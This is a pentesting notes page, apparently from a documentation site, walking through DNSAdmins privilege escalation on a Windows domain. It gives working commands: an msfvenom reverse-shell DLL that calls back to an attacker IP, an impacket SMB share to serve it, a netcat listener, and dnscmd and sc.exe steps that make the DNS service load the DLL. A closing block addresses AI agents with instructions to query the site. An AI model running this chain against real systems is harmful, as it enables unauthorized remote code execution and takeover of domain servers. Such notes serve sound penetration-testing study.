# DNSAdmin Escalation Here, what we're doing is: 1. Making a dll payload that sends a reverse shell back to our machine with msfvenom. 2. Serving it using SMB Server to make it available to the Windows machine. (You can use any other way to transfer it to the remote machine, but be careful, it might get nuked by the Anti-Virus.) And, we will also setup a netcat listener to catch our reverse shell. 3. Importing that dll in the DNS Server. 4. Restarting the DNS Server so that it loads the dll file. Checking if your user is a part of the DNSAdmins group: ```bash whoami /all ``` Now, on to the fun part: ```bash #making the payload msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.211.55.13 LPORT=4444 --platform=windows -f dll > ~/windows/privesc/plugin.dll ``` Here, because the Windows machine is of 64 bit achitechture, we're using x64 payload. ```bash #serving the file using SMB Server using smbserver.py, that comes with Python3-Impacket. cd /usr/share/doc/python3-impacket/examples ./smbserver.py SHARE ~/windows/privesc/ ``` In another terminal tab, set up a netcat listener to catch the reverse shell: ```bash nc -nvlp 4444 ``` Now, in the compromised Windows machine: ```bash #Importing the plugin: dnscmd.exe myserver.local /config /serverlevelplugindll \\10.211.55.13\share\plugin.dll #Restarting the service: sc.exe stop dns sc.exe start dns ``` Now, go back and check the netcat listener, you should have a reverse shell. #### Comment: Change domain.local to IP - when RPC Error 1772. Found that fqdn didnt work, the ip of the dns server worked a treat. ``` dnscmd.exe 10.0.0.1 /config /serverlevelplugindll \\10.211.55.13\share\plugin.dll ``` #### Observation: access denied to restarting dns service prior to successfully running the above command. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://tenaka.gitbook.io/pentesting/enumeration/dns/dnsadmin-escalation.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.